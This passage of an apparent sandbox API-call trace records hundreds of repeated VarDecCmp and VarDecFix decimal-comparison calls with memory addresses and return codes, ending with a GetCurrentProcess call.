pdecRight=0x1b62c748) returned 0x0 [0333.565] VarDecCmp (pdecLeft=0x1b62c738, pdecRight=0x1b62c728) returned 0x2 [0333.565] VarDecCmp (pdecLeft=0x1b62c8e0, pdecRight=0x1b62c8d0) returned 0x2 [0333.565] VarDecCmp (pdecLeft=0x1b62c8c0, pdecRight=0x1b62c8b0) returned 0x0 [0333.565] VarDecCmp (pdecLeft=0x1b62c758, pdecRight=0x1b62c748) returned 0x0 [0333.565] VarDecCmp (pdecLeft=0x1b62c738, pdecRight=0x1b62c728) returned 0x2 [0333.565] VarDecCmp (pdecLeft=0x1b62c8e0, pdecRight=0x1b62c8d0) returned 0x2 [0333.565] VarDecCmp (pdecLeft=0x1b62c8c0, pdecRight=0x1b62c8b0) returned 0x0 [0333.568] VarDecCmp (pdecLeft=0x1b62c8e8, pdecRight=0x1b62c8d8) returned 0x2 [0333.568] VarDecCmp (pdecLeft=0x1b62c7c8, pdecRight=0x1b62c7b8) returned 0x2 [0333.568] VarDecFix (in: pdecIn=0x1b62c7a8, pdecResult=0x1b62c730 | out: pdecResult=0x1b62c730) returned 0x0 [0333.568] VarDecCmp (pdecLeft=0x1b62c798, pdecRight=0x1b62c788) returned 0x1 [0333.568] VarDecCmp (pdecLeft=0x1b62c7c0, pdecRight=0x1b62c7b0) returned 0x2 [0333.568] VarDecFix (in: pdecIn=0x1b62c7a0, pdecResult=0x1b62c710 | out: pdecResult=0x1b62c710) returned 0x0 [0333.568] VarDecCmp (pdecLeft=0x1b62c790, pdecRight=0x1b62c780) returned 0x1 [0333.568] VarDecCmp (pdecLeft=0x1b62c770, pdecRight=0x1b62c760) returned 0x2 [0333.568] VarDecCmp (pdecLeft=0x1b62c7a8, pdecRight=0x1b62c798) returned 0x2 [0333.568] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x1 [0333.568] VarDecCmp (pdecLeft=0x1b62c898, pdecRight=0x1b62c888) returned 0x1 [0333.568] VarDecCmp (pdecLeft=0x1b62c7a8, pdecRight=0x1b62c798) returned 0x2 [0333.568] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x0 [0333.568] VarDecCmp (pdecLeft=0x1b62c968, pdecRight=0x1b62c958) returned 0x2 [0333.568] VarDecCmp (pdecLeft=0x1b62c588, pdecRight=0x1b62c578) returned 0x1 [0333.568] VarDecCmp (pdecLeft=0x1b62c568, pdecRight=0x1b62c558) returned 0x1 [0333.568] VarDecCmp (pdecLeft=0x1b62c588, pdecRight=0x1b62c578) returned 0x0 [0333.568] VarDecCmp (pdecLeft=0x1b62c548, pdecRight=0x1b62c538) returned 0x1 [0333.568] VarDecCmp (pdecLeft=0x1b62c528, pdecRight=0x1b62c518) returned 0x1 [0333.568] VarDecCmp (pdecLeft=0x1b62c7d8, pdecRight=0x1b62c7c8) returned 0x1 [0333.568] VarDecCmp (pdecLeft=0x1b62c7b8, pdecRight=0x1b62c7a8) returned 0x1 [0333.578] VarDecCmp (pdecLeft=0x1b62c778, pdecRight=0x1b62c768) returned 0x2 [0333.578] VarDecCmp (pdecLeft=0x1b62c658, pdecRight=0x1b62c648) returned 0x2 [0333.578] VarDecFix (in: pdecIn=0x1b62c638, pdecResult=0x1b62c5c0 | out: pdecResult=0x1b62c5c0) returned 0x0 [0333.578] VarDecCmp (pdecLeft=0x1b62c628, pdecRight=0x1b62c618) returned 0x1 [0333.578] VarDecCmp (pdecLeft=0x1b62c650, pdecRight=0x1b62c640) returned 0x2 [0333.578] VarDecFix (in: pdecIn=0x1b62c630, pdecResult=0x1b62c5a0 | out: pdecResult=0x1b62c5a0) returned 0x0 [0333.578] VarDecCmp (pdecLeft=0x1b62c620, pdecRight=0x1b62c610) returned 0x1 [0333.578] VarDecCmp (pdecLeft=0x1b62c600, pdecRight=0x1b62c5f0) returned 0x2 [0333.578] VarDecCmp (pdecLeft=0x1b62c638, pdecRight=0x1b62c628) returned 0x2 [0333.578] VarDecCmp (pdecLeft=0x1b62c748, pdecRight=0x1b62c738) returned 0x1 [0333.578] VarDecCmp (pdecLeft=0x1b62c728, pdecRight=0x1b62c718) returned 0x2 [0333.578] VarDecCmp (pdecLeft=0x1b62c7f8, pdecRight=0x1b62c7e8) returned 0x2 [0333.578] VarDecCmp (pdecLeft=0x1b62c418, pdecRight=0x1b62c408) returned 0x1 [0333.579] VarDecCmp (pdecLeft=0x1b62c3f8, pdecRight=0x1b62c3e8) returned 0x2 [0333.579] VarDecCmp (pdecLeft=0x1b62c3d8, pdecRight=0x1b62c3c8) returned 0x2 [0333.579] VarDecCmp (pdecLeft=0x1b62c398, pdecRight=0x1b62c388) returned 0x2 [0333.579] VarDecCmp (pdecLeft=0x1b62c358, pdecRight=0x1b62c348) returned 0x1 [0333.579] VarDecCmp (pdecLeft=0x1b62c338, pdecRight=0x1b62c328) returned 0x1 [0333.579] VarDecCmp (pdecLeft=0x1b62c668, pdecRight=0x1b62c658) returned 0x1 [0333.579] VarDecCmp (pdecLeft=0x1b62c648, pdecRight=0x1b62c638) returned 0x1 [0333.581] VarDecCmp (pdecLeft=0x1b62c778, pdecRight=0x1b62c768) returned 0x2 [0333.581] VarDecCmp (pdecLeft=0x1b62c658, pdecRight=0x1b62c648) returned 0x2 [0333.581] VarDecFix (in: pdecIn=0x1b62c638, pdecResult=0x1b62c5c0 | out: pdecResult=0x1b62c5c0) returned 0x0 [0333.581] VarDecCmp (pdecLeft=0x1b62c628, pdecRight=0x1b62c618) returned 0x1 [0333.581] VarDecCmp (pdecLeft=0x1b62c650, pdecRight=0x1b62c640) returned 0x2 [0333.581] VarDecFix (in: pdecIn=0x1b62c630, pdecResult=0x1b62c5a0 | out: pdecResult=0x1b62c5a0) returned 0x0 [0333.581] VarDecCmp (pdecLeft=0x1b62c620, pdecRight=0x1b62c610) returned 0x1 [0333.581] VarDecCmp (pdecLeft=0x1b62c600, pdecRight=0x1b62c5f0) returned 0x2 [0333.581] VarDecCmp (pdecLeft=0x1b62c638, pdecRight=0x1b62c628) returned 0x2 [0333.581] VarDecCmp (pdecLeft=0x1b62c748, pdecRight=0x1b62c738) returned 0x1 [0333.581] VarDecCmp (pdecLeft=0x1b62c728, pdecRight=0x1b62c718) returned 0x1 [0333.581] VarDecCmp (pdecLeft=0x1b62c638, pdecRight=0x1b62c628) returned 0x2 [0333.582] VarDecCmp (pdecLeft=0x1b62c748, pdecRight=0x1b62c738) returned 0x1 [0333.582] VarDecCmp (pdecLeft=0x1b62c728, pdecRight=0x1b62c718) returned 0x1 [0333.582] VarDecCmp (pdecLeft=0x1b62c7f8, pdecRight=0x1b62c7e8) returned 0x2 [0333.582] VarDecCmp (pdecLeft=0x1b62c418, pdecRight=0x1b62c408) returned 0x1 [0333.582] VarDecCmp (pdecLeft=0x1b62c3f8, pdecRight=0x1b62c3e8) returned 0x1 [0333.582] VarDecCmp (pdecLeft=0x1b62c418, pdecRight=0x1b62c408) returned 0x1 [0333.582] VarDecCmp (pdecLeft=0x1b62c3f8, pdecRight=0x1b62c3e8) returned 0x1 [0333.582] VarDecCmp (pdecLeft=0x1b62c668, pdecRight=0x1b62c658) returned 0x1 [0333.582] VarDecCmp (pdecLeft=0x1b62c648, pdecRight=0x1b62c638) returned 0x1 [0333.583] VarDecCmp (pdecLeft=0x1b62c778, pdecRight=0x1b62c768) returned 0x2 [0333.583] VarDecCmp (pdecLeft=0x1b62c658, pdecRight=0x1b62c648) returned 0x2 [0333.583] VarDecFix (in: pdecIn=0x1b62c638, pdecResult=0x1b62c5c0 | out: pdecResult=0x1b62c5c0) returned 0x0 [0333.583] VarDecCmp (pdecLeft=0x1b62c628, pdecRight=0x1b62c618) returned 0x1 [0333.583] VarDecCmp (pdecLeft=0x1b62c650, pdecRight=0x1b62c640) returned 0x2 [0333.583] VarDecFix (in: pdecIn=0x1b62c630, pdecResult=0x1b62c5a0 | out: pdecResult=0x1b62c5a0) returned 0x0 [0333.583] VarDecCmp (pdecLeft=0x1b62c620, pdecRight=0x1b62c610) returned 0x1 [0333.583] VarDecCmp (pdecLeft=0x1b62c600, pdecRight=0x1b62c5f0) returned 0x2 [0333.583] VarDecCmp (pdecLeft=0x1b62c638, pdecRight=0x1b62c628) returned 0x2 [0333.583] VarDecCmp (pdecLeft=0x1b62c748, pdecRight=0x1b62c738) returned 0x1 [0333.583] VarDecCmp (pdecLeft=0x1b62c728, pdecRight=0x1b62c718) returned 0x2 [0333.583] VarDecCmp (pdecLeft=0x1b62c7f8, pdecRight=0x1b62c7e8) returned 0x2 [0333.583] VarDecCmp (pdecLeft=0x1b62c418, pdecRight=0x1b62c408) returned 0x1 [0333.583] VarDecCmp (pdecLeft=0x1b62c3f8, pdecRight=0x1b62c3e8) returned 0x2 [0333.583] VarDecCmp (pdecLeft=0x1b62c3d8, pdecRight=0x1b62c3c8) returned 0x2 [0333.583] VarDecCmp (pdecLeft=0x1b62c398, pdecRight=0x1b62c388) returned 0x2 [0333.583] VarDecCmp (pdecLeft=0x1b62c358, pdecRight=0x1b62c348) returned 0x1 [0333.583] VarDecCmp (pdecLeft=0x1b62c338, pdecRight=0x1b62c328) returned 0x1 [0333.583] VarDecCmp (pdecLeft=0x1b62c668, pdecRight=0x1b62c658) returned 0x1 [0333.583] VarDecCmp (pdecLeft=0x1b62c648, pdecRight=0x1b62c638) returned 0x1 [0333.584] VarDecCmp (pdecLeft=0x1b62c778, pdecRight=0x1b62c768) returned 0x2 [0333.584] VarDecCmp (pdecLeft=0x1b62c658, pdecRight=0x1b62c648) returned 0x2 [0333.584] VarDecFix (in: pdecIn=0x1b62c638, pdecResult=0x1b62c5c0 | out: pdecResult=0x1b62c5c0) returned 0x0 [0333.584] VarDecCmp (pdecLeft=0x1b62c628, pdecRight=0x1b62c618) returned 0x1 [0333.584] VarDecCmp (pdecLeft=0x1b62c650, pdecRight=0x1b62c640) returned 0x2 [0333.584] VarDecFix (in: pdecIn=0x1b62c630, pdecResult=0x1b62c5a0 | out: pdecResult=0x1b62c5a0) returned 0x0 [0333.584] VarDecCmp (pdecLeft=0x1b62c620, pdecRight=0x1b62c610) returned 0x1 [0333.584] VarDecCmp (pdecLeft=0x1b62c600, pdecRight=0x1b62c5f0) returned 0x2 [0333.584] VarDecCmp (pdecLeft=0x1b62c638, pdecRight=0x1b62c628) returned 0x2 [0333.584] VarDecCmp (pdecLeft=0x1b62c748, pdecRight=0x1b62c738) returned 0x1 [0333.584] VarDecCmp (pdecLeft=0x1b62c728, pdecRight=0x1b62c718) returned 0x2 [0333.584] VarDecCmp (pdecLeft=0x1b62c7f8, pdecRight=0x1b62c7e8) returned 0x2 [0333.584] VarDecCmp (pdecLeft=0x1b62c418, pdecRight=0x1b62c408) returned 0x1 [0333.584] VarDecCmp (pdecLeft=0x1b62c3f8, pdecRight=0x1b62c3e8) returned 0x2 [0333.584] VarDecCmp (pdecLeft=0x1b62c3d8, pdecRight=0x1b62c3c8) returned 0x2 [0333.584] VarDecCmp (pdecLeft=0x1b62c398, pdecRight=0x1b62c388) returned 0x2 [0333.584] VarDecCmp (pdecLeft=0x1b62c358, pdecRight=0x1b62c348) returned 0x1 [0333.584] VarDecCmp (pdecLeft=0x1b62c338, pdecRight=0x1b62c328) returned 0x1 [0333.584] VarDecCmp (pdecLeft=0x1b62c668, pdecRight=0x1b62c658) returned 0x1 [0333.584] VarDecCmp (pdecLeft=0x1b62c648, pdecRight=0x1b62c638) returned 0x1 [0333.585] VarDecCmp (pdecLeft=0x1b62c778, pdecRight=0x1b62c768) returned 0x2 [0333.585] VarDecCmp (pdecLeft=0x1b62c658, pdecRight=0x1b62c648) returned 0x2 [0333.585] VarDecFix (in: pdecIn=0x1b62c638, pdecResult=0x1b62c5c0 | out: pdecResult=0x1b62c5c0) returned 0x0 [0333.585] VarDecCmp (pdecLeft=0x1b62c628, pdecRight=0x1b62c618) returned 0x1 [0333.585] VarDecCmp (pdecLeft=0x1b62c650, pdecRight=0x1b62c640) returned 0x2 [0333.585] VarDecFix (in: pdecIn=0x1b62c630, pdecResult=0x1b62c5a0 | out: pdecResult=0x1b62c5a0) returned 0x0 [0333.585] VarDecCmp (pdecLeft=0x1b62c620, pdecRight=0x1b62c610) returned 0x1 [0333.585] VarDecCmp (pdecLeft=0x1b62c600, pdecRight=0x1b62c5f0) returned 0x2 [0333.585] VarDecCmp (pdecLeft=0x1b62c638, pdecRight=0x1b62c628) returned 0x2 [0333.585] VarDecCmp (pdecLeft=0x1b62c748, pdecRight=0x1b62c738) returned 0x1 [0333.585] VarDecCmp (pdecLeft=0x1b62c728, pdecRight=0x1b62c718) returned 0x2 [0333.585] VarDecCmp (pdecLeft=0x1b62c7f8, pdecRight=0x1b62c7e8) returned 0x2 [0333.585] VarDecCmp (pdecLeft=0x1b62c418, pdecRight=0x1b62c408) returned 0x1 [0333.585] VarDecCmp (pdecLeft=0x1b62c3f8, pdecRight=0x1b62c3e8) returned 0x2 [0333.585] VarDecCmp (pdecLeft=0x1b62c3d8, pdecRight=0x1b62c3c8) returned 0x2 [0333.585] VarDecCmp (pdecLeft=0x1b62c398, pdecRight=0x1b62c388) returned 0x2 [0333.585] VarDecCmp (pdecLeft=0x1b62c358, pdecRight=0x1b62c348) returned 0x1 [0333.585] VarDecCmp (pdecLeft=0x1b62c338, pdecRight=0x1b62c328) returned 0x1 [0333.585] VarDecCmp (pdecLeft=0x1b62c668, pdecRight=0x1b62c658) returned 0x1 [0333.585] VarDecCmp (pdecLeft=0x1b62c648, pdecRight=0x1b62c638) returned 0x1 [0333.587] VarDecCmp (pdecLeft=0x1b62c778, pdecRight=0x1b62c768) returned 0x2 [0333.587] VarDecCmp (pdecLeft=0x1b62c658, pdecRight=0x1b62c648) returned 0x2 [0333.587] VarDecFix (in: pdecIn=0x1b62c638, pdecResult=0x1b62c5c0 | out: pdecResult=0x1b62c5c0) returned 0x0 [0333.587] VarDecCmp (pdecLeft=0x1b62c628, pdecRight=0x1b62c618) returned 0x1 [0333.587] VarDecCmp (pdecLeft=0x1b62c650, pdecRight=0x1b62c640) returned 0x2 [0333.587] VarDecFix (in: pdecIn=0x1b62c630, pdecResult=0x1b62c5a0 | out: pdecResult=0x1b62c5a0) returned 0x0 [0333.587] VarDecCmp (pdecLeft=0x1b62c620, pdecRight=0x1b62c610) returned 0x1 [0333.587] VarDecCmp (pdecLeft=0x1b62c600, pdecRight=0x1b62c5f0) returned 0x2 [0333.587] VarDecCmp (pdecLeft=0x1b62c638, pdecRight=0x1b62c628) returned 0x2 [0333.587] VarDecCmp (pdecLeft=0x1b62c748, pdecRight=0x1b62c738) returned 0x1 [0333.587] VarDecCmp (pdecLeft=0x1b62c728, pdecRight=0x1b62c718) returned 0x1 [0333.587] VarDecCmp (pdecLeft=0x1b62c638, pdecRight=0x1b62c628) returned 0x2 [0333.587] VarDecCmp (pdecLeft=0x1b62c748, pdecRight=0x1b62c738) returned 0x0 [0333.587] VarDecCmp (pdecLeft=0x1b62c7f8, pdecRight=0x1b62c7e8) returned 0x2 [0333.587] VarDecCmp (pdecLeft=0x1b62c418, pdecRight=0x1b62c408) returned 0x1 [0333.587] VarDecCmp (pdecLeft=0x1b62c3f8, pdecRight=0x1b62c3e8) returned 0x1 [0333.587] VarDecCmp (pdecLeft=0x1b62c418, pdecRight=0x1b62c408) returned 0x0 [0333.587] VarDecCmp (pdecLeft=0x1b62c3d8, pdecRight=0x1b62c3c8) returned 0x1 [0333.587] VarDecCmp (pdecLeft=0x1b62c3b8, pdecRight=0x1b62c3a8) returned 0x1 [0333.587] VarDecCmp (pdecLeft=0x1b62c668, pdecRight=0x1b62c658) returned 0x1 [0333.587] VarDecCmp (pdecLeft=0x1b62c648, pdecRight=0x1b62c638) returned 0x1 [0333.588] VarDecCmp (pdecLeft=0x1b62c778, pdecRight=0x1b62c768) returned 0x2 [0333.588] VarDecCmp (pdecLeft=0x1b62c658, pdecRight=0x1b62c648) returned 0x2 [0333.588] VarDecFix (in: pdecIn=0x1b62c638, pdecResult=0x1b62c5c0 | out: pdecResult=0x1b62c5c0) returned 0x0 [0333.588] VarDecCmp (pdecLeft=0x1b62c628, pdecRight=0x1b62c618) returned 0x1 [0333.588] VarDecCmp (pdecLeft=0x1b62c650, pdecRight=0x1b62c640) returned 0x2 [0333.588] VarDecFix (in: pdecIn=0x1b62c630, pdecResult=0x1b62c5a0 | out: pdecResult=0x1b62c5a0) returned 0x0 [0333.588] VarDecCmp (pdecLeft=0x1b62c620, pdecRight=0x1b62c610) returned 0x1 [0333.588] VarDecCmp (pdecLeft=0x1b62c600, pdecRight=0x1b62c5f0) returned 0x2 [0333.588] VarDecCmp (pdecLeft=0x1b62c638, pdecRight=0x1b62c628) returned 0x2 [0333.588] VarDecCmp (pdecLeft=0x1b62c748, pdecRight=0x1b62c738) returned 0x1 [0333.588] VarDecCmp (pdecLeft=0x1b62c728, pdecRight=0x1b62c718) returned 0x2 [0333.588] VarDecCmp (pdecLeft=0x1b62c7f8, pdecRight=0x1b62c7e8) returned 0x2 [0333.588] VarDecCmp (pdecLeft=0x1b62c418, pdecRight=0x1b62c408) returned 0x1 [0333.588] VarDecCmp (pdecLeft=0x1b62c3f8, pdecRight=0x1b62c3e8) returned 0x2 [0333.588] VarDecCmp (pdecLeft=0x1b62c3d8, pdecRight=0x1b62c3c8) returned 0x2 [0333.588] VarDecCmp (pdecLeft=0x1b62c398, pdecRight=0x1b62c388) returned 0x2 [0333.588] VarDecCmp (pdecLeft=0x1b62c358, pdecRight=0x1b62c348) returned 0x1 [0333.588] VarDecCmp (pdecLeft=0x1b62c338, pdecRight=0x1b62c328) returned 0x1 [0333.588] VarDecCmp (pdecLeft=0x1b62c668, pdecRight=0x1b62c658) returned 0x1 [0333.588] VarDecCmp (pdecLeft=0x1b62c648, pdecRight=0x1b62c638) returned 0x1 [0333.589] VarDecCmp (pdecLeft=0x1b62c778, pdecRight=0x1b62c768) returned 0x2 [0333.589] VarDecCmp (pdecLeft=0x1b62c658, pdecRight=0x1b62c648) returned 0x2 [0333.589] VarDecFix (in: pdecIn=0x1b62c638, pdecResult=0x1b62c5c0 | out: pdecResult=0x1b62c5c0) returned 0x0 [0333.589] VarDecCmp (pdecLeft=0x1b62c628, pdecRight=0x1b62c618) returned 0x1 [0333.589] VarDecCmp (pdecLeft=0x1b62c650, pdecRight=0x1b62c640) returned 0x2 [0333.589] VarDecFix (in: pdecIn=0x1b62c630, pdecResult=0x1b62c5a0 | out: pdecResult=0x1b62c5a0) returned 0x0 [0333.589] VarDecCmp (pdecLeft=0x1b62c620, pdecRight=0x1b62c610) returned 0x1 [0333.589] VarDecCmp (pdecLeft=0x1b62c600, pdecRight=0x1b62c5f0) returned 0x2 [0333.589] VarDecCmp (pdecLeft=0x1b62c638, pdecRight=0x1b62c628) returned 0x2 [0333.589] VarDecCmp (pdecLeft=0x1b62c748, pdecRight=0x1b62c738) returned 0x1 [0333.589] VarDecCmp (pdecLeft=0x1b62c728, pdecRight=0x1b62c718) returned 0x2 [0333.589] VarDecCmp (pdecLeft=0x1b62c7f8, pdecRight=0x1b62c7e8) returned 0x2 [0333.590] VarDecCmp (pdecLeft=0x1b62c418, pdecRight=0x1b62c408) returned 0x1 [0333.590] VarDecCmp (pdecLeft=0x1b62c3f8, pdecRight=0x1b62c3e8) returned 0x2 [0333.590] VarDecCmp (pdecLeft=0x1b62c3d8, pdecRight=0x1b62c3c8) returned 0x2 [0333.590] VarDecCmp (pdecLeft=0x1b62c398, pdecRight=0x1b62c388) returned 0x2 [0333.590] VarDecCmp (pdecLeft=0x1b62c358, pdecRight=0x1b62c348) returned 0x1 [0333.590] VarDecCmp (pdecLeft=0x1b62c338, pdecRight=0x1b62c328) returned 0x1 [0333.590] VarDecCmp (pdecLeft=0x1b62c668, pdecRight=0x1b62c658) returned 0x1 [0333.590] VarDecCmp (pdecLeft=0x1b62c648, pdecRight=0x1b62c638) returned 0x1 [0333.591] VarDecCmp (pdecLeft=0x1b62c418, pdecRight=0x1b62c408) returned 0x0 [0333.591] VarDecCmp (pdecLeft=0x1b62c3d8, pdecRight=0x1b62c3c8) returned 0x1 [0333.591] VarDecCmp (pdecLeft=0x1b62c3b8, pdecRight=0x1b62c3a8) returned 0x1 [0333.591] VarDecCmp (pdecLeft=0x1b62c668, pdecRight=0x1b62c658) returned 0x1 [0333.591] VarDecCmp (pdecLeft=0x1b62c648, pdecRight=0x1b62c638) returned 0x1 [0333.617] VarDecCmp (pdecLeft=0x1b62c778, pdecRight=0x1b62c768) returned 0x2 [0333.617] VarDecCmp (pdecLeft=0x1b62c658, pdecRight=0x1b62c648) returned 0x2 [0333.617] VarDecFix (in: pdecIn=0x1b62c638, pdecResult=0x1b62c5c0 | out: pdecResult=0x1b62c5c0) returned 0x0 [0333.617] VarDecCmp (pdecLeft=0x1b62c628, pdecRight=0x1b62c618) returned 0x1 [0333.617] VarDecCmp (pdecLeft=0x1b62c650, pdecRight=0x1b62c640) returned 0x2 [0333.617] VarDecFix (in: pdecIn=0x1b62c630, pdecResult=0x1b62c5a0 | out: pdecResult=0x1b62c5a0) returned 0x0 [0333.617] VarDecCmp (pdecLeft=0x1b62c620, pdecRight=0x1b62c610) returned 0x1 [0333.617] VarDecCmp (pdecLeft=0x1b62c600, pdecRight=0x1b62c5f0) returned 0x2 [0333.617] VarDecCmp (pdecLeft=0x1b62c638, pdecRight=0x1b62c628) returned 0x2 [0333.617] VarDecCmp (pdecLeft=0x1b62c748, pdecRight=0x1b62c738) returned 0x1 [0333.617] VarDecCmp (pdecLeft=0x1b62c728, pdecRight=0x1b62c718) returned 0x1 [0333.617] VarDecCmp (pdecLeft=0x1b62c638, pdecRight=0x1b62c628) returned 0x2 [0333.617] VarDecCmp (pdecLeft=0x1b62c748, pdecRight=0x1b62c738) returned 0x0 [0333.617] VarDecCmp (pdecLeft=0x1b62c638, pdecRight=0x1b62c628) returned 0x2 [0333.617] VarDecCmp (pdecLeft=0x1b62c748, pdecRight=0x1b62c738) returned 0x0 [0333.617] VarDecCmp (pdecLeft=0x1b62c7f8, pdecRight=0x1b62c7e8) returned 0x2 [0333.617] VarDecCmp (pdecLeft=0x1b62c418, pdecRight=0x1b62c408) returned 0x1 [0333.617] VarDecCmp (pdecLeft=0x1b62c3f8, pdecRight=0x1b62c3e8) returned 0x1 [0333.617] VarDecCmp (pdecLeft=0x1b62c418, pdecRight=0x1b62c408) returned 0x0 [0333.617] VarDecCmp (pdecLeft=0x1b62c3d8, pdecRight=0x1b62c3c8) returned 0x1 [0333.617] VarDecCmp (pdecLeft=0x1b62c3b8, pdecRight=0x1b62c3a8) returned 0x1 [0333.617] VarDecCmp (pdecLeft=0x1b62c418, pdecRight=0x1b62c408) returned 0x0 [0333.617] VarDecCmp (pdecLeft=0x1b62c3d8, pdecRight=0x1b62c3c8) returned 0x1 [0333.617] VarDecCmp (pdecLeft=0x1b62c3b8, pdecRight=0x1b62c3a8) returned 0x2 [0333.617] VarDecCmp (pdecLeft=0x1b62c398, pdecRight=0x1b62c388) returned 0x1 [0333.617] VarDecCmp (pdecLeft=0x1b62c378, pdecRight=0x1b62c368) returned 0x1 [0333.617] VarDecCmp (pdecLeft=0x1b62c668, pdecRight=0x1b62c658) returned 0x1 [0333.617] VarDecCmp (pdecLeft=0x1b62c648, pdecRight=0x1b62c638) returned 0x1 [0333.618] VarDecCmp (pdecLeft=0x1b62c7a8, pdecRight=0x1b62c798) returned 0x2 [0333.618] VarDecCmp (pdecLeft=0x1b62c628, pdecRight=0x1b62c618) returned 0x2 [0333.618] VarDecFix (in: pdecIn=0x1b62c608, pdecResult=0x1b62c590 | out: pdecResult=0x1b62c590) returned 0x0 [0333.618] VarDecCmp (pdecLeft=0x1b62c5f8, pdecRight=0x1b62c5e8) returned 0x1 [0333.618] VarDecCmp (pdecLeft=0x1b62c620, pdecRight=0x1b62c610) returned 0x2 [0333.618] VarDecFix (in: pdecIn=0x1b62c600, pdecResult=0x1b62c570 | out: pdecResult=0x1b62c570) returned 0x0 [0333.618] VarDecCmp (pdecLeft=0x1b62c5f0, pdecRight=0x1b62c5e0) returned 0x1 [0333.618] VarDecCmp (pdecLeft=0x1b62c5d0, pdecRight=0x1b62c5c0) returned 0x2 [0333.618] VarDecCmp (pdecLeft=0x1b62c608, pdecRight=0x1b62c5f8) returned 0x2 [0333.618] VarDecCmp (pdecLeft=0x1b62c738, pdecRight=0x1b62c728) returned 0x1 [0333.618] VarDecCmp (pdecLeft=0x1b62c718, pdecRight=0x1b62c708) returned 0x1 [0333.618] VarDecCmp (pdecLeft=0x1b62c828, pdecRight=0x1b62c818) returned 0x2 [0333.618] VarDecCmp (pdecLeft=0x1b62c418, pdecRight=0x1b62c408) returned 0x1 [0333.618] VarDecCmp (pdecLeft=0x1b62c3f8, pdecRight=0x1b62c3e8) returned 0x1 [0333.618] VarDecCmp (pdecLeft=0x1b62c668, pdecRight=0x1b62c658) returned 0x1 [0333.618] VarDecCmp (pdecLeft=0x1b62c648, pdecRight=0x1b62c638) returned 0x2 [0333.618] VarDecCmp (pdecLeft=0x1b62c628, pdecRight=0x1b62c618) returned 0x2 [0333.618] VarDecCmp (pdecLeft=0x1b62c5e8, pdecRight=0x1b62c5d8) returned 0x2 [0333.618] VarDecCmp (pdecLeft=0x1b62c5a8, pdecRight=0x1b62c598) returned 0x1 [0333.619] VarDecCmp (pdecLeft=0x1b62c588, pdecRight=0x1b62c578) returned 0x1 [0333.619] VarDecCmp (pdecLeft=0x1b62c778, pdecRight=0x1b62c768) returned 0x2 [0333.619] VarDecCmp (pdecLeft=0x1b62c658, pdecRight=0x1b62c648) returned 0x2 [0333.619] VarDecFix (in: pdecIn=0x1b62c638, pdecResult=0x1b62c5c0 | out: pdecResult=0x1b62c5c0) returned 0x0 [0333.619] VarDecCmp (pdecLeft=0x1b62c628, pdecRight=0x1b62c618) returned 0x1 [0333.619] VarDecCmp (pdecLeft=0x1b62c650, pdecRight=0x1b62c640) returned 0x2 [0333.619] VarDecFix (in: pdecIn=0x1b62c630, pdecResult=0x1b62c5a0 | out: pdecResult=0x1b62c5a0) returned 0x0 [0333.619] VarDecCmp (pdecLeft=0x1b62c620, pdecRight=0x1b62c610) returned 0x1 [0333.619] VarDecCmp (pdecLeft=0x1b62c600, pdecRight=0x1b62c5f0) returned 0x2 [0333.619] VarDecCmp (pdecLeft=0x1b62c638, pdecRight=0x1b62c628) returned 0x2 [0333.619] VarDecCmp (pdecLeft=0x1b62c748, pdecRight=0x1b62c738) returned 0x1 [0333.619] VarDecCmp (pdecLeft=0x1b62c728, pdecRight=0x1b62c718) returned 0x2 [0333.619] VarDecCmp (pdecLeft=0x1b62c7f8, pdecRight=0x1b62c7e8) returned 0x2 [0333.619] VarDecCmp (pdecLeft=0x1b62c418, pdecRight=0x1b62c408) returned 0x1 [0333.619] VarDecCmp (pdecLeft=0x1b62c3f8, pdecRight=0x1b62c3e8) returned 0x2 [0333.619] VarDecCmp (pdecLeft=0x1b62c3d8, pdecRight=0x1b62c3c8) returned 0x2 [0333.619] VarDecCmp (pdecLeft=0x1b62c398, pdecRight=0x1b62c388) returned 0x2 [0333.619] VarDecCmp (pdecLeft=0x1b62c358, pdecRight=0x1b62c348) returned 0x1 [0333.619] VarDecCmp (pdecLeft=0x1b62c338, pdecRight=0x1b62c328) returned 0x1 [0333.619] VarDecCmp (pdecLeft=0x1b62c668, pdecRight=0x1b62c658) returned 0x1 [0333.619] VarDecCmp (pdecLeft=0x1b62c648, pdecRight=0x1b62c638) returned 0x1 [0333.632] VarDecCmp (pdecLeft=0x1b62c778, pdecRight=0x1b62c768) returned 0x2 [0333.632] VarDecCmp (pdecLeft=0x1b62c658, pdecRight=0x1b62c648) returned 0x2 [0333.632] VarDecFix (in: pdecIn=0x1b62c638, pdecResult=0x1b62c5c0 | out: pdecResult=0x1b62c5c0) returned 0x0 [0333.632] VarDecCmp (pdecLeft=0x1b62c628, pdecRight=0x1b62c618) returned 0x1 [0333.632] VarDecCmp (pdecLeft=0x1b62c650, pdecRight=0x1b62c640) returned 0x2 [0333.632] VarDecFix (in: pdecIn=0x1b62c630, pdecResult=0x1b62c5a0 | out: pdecResult=0x1b62c5a0) returned 0x0 [0333.632] VarDecCmp (pdecLeft=0x1b62c620, pdecRight=0x1b62c610) returned 0x1 [0333.632] VarDecCmp (pdecLeft=0x1b62c600, pdecRight=0x1b62c5f0) returned 0x2 [0333.632] VarDecCmp (pdecLeft=0x1b62c638, pdecRight=0x1b62c628) returned 0x2 [0333.632] VarDecCmp (pdecLeft=0x1b62c748, pdecRight=0x1b62c738) returned 0x1 [0333.632] VarDecCmp (pdecLeft=0x1b62c728, pdecRight=0x1b62c718) returned 0x2 [0333.632] VarDecCmp (pdecLeft=0x1b62c7f8, pdecRight=0x1b62c7e8) returned 0x2 [0333.632] VarDecCmp (pdecLeft=0x1b62c418, pdecRight=0x1b62c408) returned 0x1 [0333.632] VarDecCmp (pdecLeft=0x1b62c3f8, pdecRight=0x1b62c3e8) returned 0x2 [0333.632] VarDecCmp (pdecLeft=0x1b62c3d8, pdecRight=0x1b62c3c8) returned 0x2 [0333.632] VarDecCmp (pdecLeft=0x1b62c398, pdecRight=0x1b62c388) returned 0x2 [0333.632] VarDecCmp (pdecLeft=0x1b62c358, pdecRight=0x1b62c348) returned 0x1 [0333.632] VarDecCmp (pdecLeft=0x1b62c338, pdecRight=0x1b62c328) returned 0x1 [0333.632] VarDecCmp (pdecLeft=0x1b62c668, pdecRight=0x1b62c658) returned 0x1 [0333.632] VarDecCmp (pdecLeft=0x1b62c648, pdecRight=0x1b62c638) returned 0x1 [0333.645] GetCurrentProcess () returned 0xffffffffffffffff [0333.645] 